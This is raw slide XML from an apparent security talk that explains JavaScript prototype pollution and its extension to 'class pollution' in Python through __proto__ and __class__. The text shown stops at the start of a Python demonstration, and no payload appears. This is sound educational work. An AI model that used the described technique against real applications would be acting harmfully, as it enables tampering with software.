            </a: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".help"</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for</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more information.</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8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1234567891011121314151617181920212223242526272829303132</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n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err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BigInts</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can represent extremely large integers.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altLang="zh-HK" sz="900" kern="0" dirty="0" err="1">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bigint</a:t>
            </a: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D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>true</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Booleans are either `false` and `true`.</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'Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a: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D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>null</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Null represents the lack of value. For historical reasons, the `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="0" dirty="0" err="1">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operator returns `object` instead of `null`.</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'object'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8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>42</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Numbers can represent integers.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'number'</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8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4.2</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Numbers can also represent decimal numbers. It is backed by 64-bit floating point number.</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'number'</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Object (and its subtype function) is the only type that can have properties.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'object'</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function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E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Functions are also objects. The difference is that you can call functions.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'function'</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"firebird"</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Strings represent a sequence of characters. They can act as property names.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'string'</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D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Symbol</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Symbol are used to act as property names while avoiding collision with string property names.</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'symbol'</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err="1">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>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solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>undefined</a:t>
            </a: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Undefined is a type unique to JavaScript. It kind of acts like `null`.</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005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'undefined'</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solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="0" dirty="0" err="1">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on MDN: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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="100" dirty="0">
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:b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Why `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>typeof</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null` returns `object`?: </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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof#typeof_null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-HK" sz="9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146050" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65A13E5-F73F-A63F-12AA-95DA9ACCB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552108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3201-48A8-E585-3C22-DABA1C3F7815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Generalizations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>(plot twist)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{002D2351-8F89-E2AF-DF80-AA383F5176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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28254359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75E9E-784F-6D5C-8466-82B76FECB36F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Generalizations</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7614ECA1-C871-65A1-AF42-796A345EDFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>While today’s topic is mainly focused on JavaScript, this would work on programming languages that has the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>charateristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Prototype-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Provides unvetted access to prototypes like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Prototypes are mutable at runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Programming languages that are most like JavaScript are derivatives of JavaScript, such as TypeScript, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>CoffeeScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, etc. [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
              <a:t>But are there any other programming languages…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11562CA4-3BD8-B1D1-D98A-AB8979329F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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E0C4FD3-FBDC-F8B8-446F-B53A9ABCE540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4928007"/>
            <a:ext cx="7209402" cy="21544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https://gist.github.com/matthiasak/c3c9c40d0f98ca91def1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26640673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2F54-298D-52D8-7619-6167CFA7D33B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365E2279-FA83-CA02-802A-27D04780B4A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>And its name is called…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="8000" b="1" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="8000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D2AEB2-5EB3-AF79-87F2-B9214A3970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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15412290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09900-A847-B4D2-4929-ACEA0CDFCE08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Class pollution in Python</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44883CBC-C25E-EAAA-3698-DED200D18774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The “prototype” can also be a “class”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Consider Python…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" strike="sngStrike" dirty="0"/>
              <a:t>Prototype-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: Irrelevant, we need to drop the insistence that it must be called “prototype”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Provides unvetted access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" strike="sngStrike" dirty="0"/>
              <a:t>prototypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> classes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj.__class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" strike="sngStrike" dirty="0"/>
              <a:t>Prototypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> classes are mutable at runtime: you can assign new attributes to classes after creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Example in the next slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266C77AA-187B-EF16-57A4-397EEF9C95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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E12E875-A2BB-8996-6E4D-AA2AC73A8CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4928007"/>
            <a:ext cx="7209402" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.python.org/3/library/stdtypes.html#instance.__class__</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28388262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B6043-C7C5-23B5-0D34-8A44E75D5E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Class pollution in Python demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54AECA4-BAE2-862E-C7D7-C286190626D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3.13.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a6 (tags/v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.13.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>57</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aee2a, Apr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
